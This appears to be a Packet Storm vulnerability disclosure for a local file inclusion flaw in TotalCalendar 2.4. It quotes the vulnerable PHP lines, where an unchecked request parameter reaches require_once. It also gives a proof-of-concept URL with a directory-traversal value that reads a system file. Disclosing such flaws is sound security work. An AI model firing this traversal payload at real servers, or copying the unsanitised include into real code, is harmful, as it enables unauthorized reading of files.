TotalCalendar version 2.4 suffers from a local file inclusion vulnerability.
99a5437ddc1b622b9b0750cd85c1176db45fafcfe13b35f5ed933928abe6dea2##########################################################################################
[+] TotalCalendar 2.4 (include) Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##########################################################################################
[+] Local File Inclusion
Vulnerable code in cms_detect.php:
-------------------------------------------------------------------------------
Line 26 : $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null;
Line 115 : if(!empty($include)) require_once($inc_dir.$include);
-------------------------------------------------------------------------------
PoC :
http://127.0.0.1/[path]/cms_detect.php?include=../../../../../../BOOTSECT.BAK
##########################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed